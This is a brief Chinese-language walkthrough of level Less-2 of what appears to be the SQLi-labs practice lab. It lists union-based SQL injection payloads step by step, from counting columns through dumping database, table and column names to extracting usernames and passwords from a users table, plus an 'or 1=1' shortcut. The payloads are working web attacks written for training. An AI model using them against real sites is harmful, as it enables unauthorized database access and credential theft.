Less-2
第二关和第一关思路是一样的
Less-2和Less-1唯一的区别就是id类型不同了,Less-2的id是一个int类型
按照上一篇的检测方法
接下来就和第一关的一样了
查看多少列
id=1 order by 3–+
查看什么地方有回显
id=-1 union select 1,2,3–+
爆库
id=-1 union select 1,2,database()–+
爆表名
id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ –+
爆列名
id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ –+
爆数据
?id=-1 union select 1,2,group_concat(concat_ws(‘,’,username,password) separator ‘|’) from users –+
特殊方法
or 1=1 或者 and 1=1等直接爆密码,但只能爆出一组。